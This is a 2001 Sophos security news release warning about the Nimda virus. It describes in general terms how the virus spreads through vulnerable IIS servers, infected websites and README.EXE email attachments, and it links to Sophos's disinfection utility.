Security news
Security news19 September 2001
Nimda virus spreading across internet - Sophos warns against double pronged attack
Sophos, a world leader in corporate anti-virus protection, is today warning users to be on their guard against a destructive new virus called W32/Nimda-A. Sophos has already received hundreds of reports of the virus in the wild.
Using a vulnerability in Microsoft's IIS web server software, the Nimda virus corrupts websites with malicious code. Without their knowledge, innocent computer users can trigger the virus by simply browsing a website. The virus then forwards itself by email to all addresses found on the user's computer. Infected e-mails carry the attachment README.EXE and on some systems will execute automatically without the user having to double-click on the attachment.
"This virus is serious - you can get stung by browsing the internet or by opening an infected email," said Graham Cluley, senior technology consultant, Sophos Anti-Virus. "You can think of Nimda as combining the mechanisms of three existing viruses: CodeRed-II (which mounts an attack against unpatched web servers), Kakworm (which exploits unpatched mailers/browsers to run encoded files automatically), and Sircam (sends an email attachment and assumes that at least some users will click on it)."
Users with web servers compromised by Nimda are advised to replace all modified files, and to carry out a full security audit. One of the exploits by which Nimda attacks servers relies on holes left behind by a previous Troj/CodeRed-II attack - and Nimda itself tries to open additional security holes, such as giving administrative powers to the "guest" user, which is supposed to be a highly restricted account.
Sophos researchers have developed a standalone utility which can detect and disinfect the W32/Nimda-A virus.
 | Download nimda.zip (Utility and instructions, Zip file) |
| Download nimdasfx.exe (Utility and instructions, self-extracting Zip file) |
| Read instructions for using the utility |
